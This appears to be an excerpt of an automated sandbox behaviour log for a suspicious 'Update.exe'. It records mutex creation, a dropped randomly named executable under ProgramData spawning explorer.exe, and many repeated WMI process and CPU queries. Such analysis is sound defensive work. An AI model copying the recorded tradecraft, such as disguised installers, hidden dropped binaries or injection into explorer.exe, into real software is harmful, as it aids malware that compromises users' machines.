                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
                    Source: C:\Users\user\Desktop\Update.exeMutant created: \Sessions\1\BaseNamedObjects\U
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5960:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7932:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8276:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8060:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8892:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7464:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8752:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8908:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2300:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2668:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8816:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9108:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:9000:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9064:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8968:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8300:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522Jump to behavior
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\explorer.exe
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeProcess created: C:\Windows\explorer.exe
                    Source: Update.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
                    Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
